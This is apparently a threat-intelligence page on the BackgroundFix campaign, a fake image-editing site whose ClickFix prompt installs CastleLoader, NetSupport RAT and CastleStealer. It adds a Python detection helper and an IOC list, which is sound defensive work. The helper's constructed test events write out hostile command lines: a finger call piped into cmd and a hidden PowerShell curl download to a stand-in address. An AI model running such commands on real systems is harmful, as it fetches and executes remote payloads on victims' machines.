Malicious Background Removal Tool Distributes RATs and Infostealers

Severity: High (Score: 72.5)

Sources: Huntress, Cybernews

Summary

Huntress has identified a campaign, dubbed BackgroundFix, that uses a fake background-removal website to trick visitors into running malicious commands on their own machines. The site masquerades as a free image-editing service and targets users who have no established photo-editing tools and are therefore likely to try an unfamiliar web service. The attack begins when the visitor clicks a CAPTCHA-like verification checkbox: the page copies a command to the clipboard and the "verification" prompt leads the user to paste and execute it. That command installs CastleLoader, which in turn drops the NetSupport RAT and a custom infostealer tracked as CastleStealer. CastleStealer harvests sensitive data such as saved passwords, session files and cryptocurrency wallet information. The campaign is ongoing; multiple domains have been observed using the same malicious site template. Users should treat any web page that asks them to copy, paste and run a command as a "verification" step as malicious, and should be cautious with unfamiliar web tools in general.

Key Points

  • BackgroundFix masquerades as a legitimate photo-editing tool to distribute malware.
  • The attack relies on social engineering (a copy-paste verification prompt) to get victims to execute malicious commands on their own systems.
  • CastleStealer targets sensitive data, including saved passwords, session files and crypto wallet information.
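The chain above is the ClickFix pattern: a clipboard-seeded command pasted into a shell by the victim, which then pulls the loader with a living-off-the-land downloader. The following is an added triage helper written for this page, not tooling from Huntress, Cybernews or the campaign itself. It matches file hashes against the two SHA256 IOCs listed under Key Entities and scans process-creation events for the paste-and-run shape: a Windows command shell started from Explorer (the Run dialog) whose command line invokes finger.exe or curl, two of the tools the page lists. The events and file contents are constructed for illustration; the field names mirror Sysmon Event ID 1, and the assumption that a Win+R launch has explorer.exe as parent is the author's, not a claim from the report.

```python
"""
Added triage helper for the BackgroundFix chain. Example code written for
this page, not tooling from Huntress or Cybernews. All event records and
file contents below are constructed; no real telemetry or samples are used.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# SHA256 IOCs copied from the page's Key Entities list.
IOC_SHA256 = {
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
}

# Download/execution helpers the page associates with the command stage.
LOLBIN_RE = re.compile(r"\b(?:finger|curl)(?:\.exe)?\b", re.IGNORECASE)
# Shells a ClickFix prompt is pasted into. Assumption (not from the report):
# the victim uses Win+R, so the shell's parent process is explorer.exe.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating both slash styles."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix_like(ev: ProcEvent) -> bool:
    """True when a shell spawned from Explorer reaches for finger/curl."""
    return (
        basename(ev.parent_image) in RUN_DIALOG_PARENTS
        and basename(ev.image) in SHELLS
        and LOLBIN_RE.search(ev.command_line) is not None
    )


def flag_events(events: Iterable[ProcEvent]) -> List[ProcEvent]:
    """Return only the events matching the paste-and-run pattern."""
    return [ev for ev in events if is_clickfix_like(ev)]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_iocs(samples: Dict[str, bytes]) -> List[str]:
    """Names of samples whose SHA256 appears in the page's IOC list."""
    return sorted(name for name, blob in samples.items() if sha256_hex(blob) in IOC_SHA256)


# Constructed events: two paste-and-run launches, one benign Run-dialog
# command, and a curl invocation from a developer tool (wrong parent).
# 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c finger user@203.0.113.10 | cmd"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "curl http://203.0.113.10/a.txt -o $env:TEMP\\a.py"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c ipconfig /all"),
    ProcEvent(r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c curl https://example.com/api"),
]

# Constructed file contents; none is a real sample, so no IOC should match.
SAMPLE_FILES = {"a.py": b"print('constructed placeholder')", "notes.txt": b"benign"}

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_EVENTS):
        print("ClickFix-like launch:", basename(ev.image), "<-", ev.command_line)
    print("IOC hash matches:", match_iocs(SAMPLE_FILES) or "none")
```

Run against real Sysmon or EDR process-creation exports, the parent-image check is what keeps the rule quiet: curl and finger are common from developer tools and scheduled tasks, but a shell started from Explorer that immediately downloads and pipes into another interpreter is the signature of a user pasting a "verification" command. The hash check is only as good as the IOC list; treat it as a confirmation step, not the primary detection.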

Key Entities

  • Malware (attack_type)
  • Phishing (attack_type)
  • BackgroundFix (campaign)
  • CWE-327 - Use of a Broken or Risky Cryptographic Algorithm (cwe)
  • python.org (domain)
  • CastleLoader (malware)
  • CastleStealer (malware)
  • NetSupport RAT (malware)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1027 - Obfuscated Files or Information (mitre_attack)
  • T1055.012 - Process Hollowing (mitre_attack)
  • T1059.003 - Windows Command Shell (mitre_attack)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • Chrome (tool)
  • Python (tool)
  • Curl (tool)
  • Finger.exe (tool)
  • Chromium (platform)
  • Linux (platform)
  • Windows (platform)
  • bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 (sha256)
  • ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9 (sha256)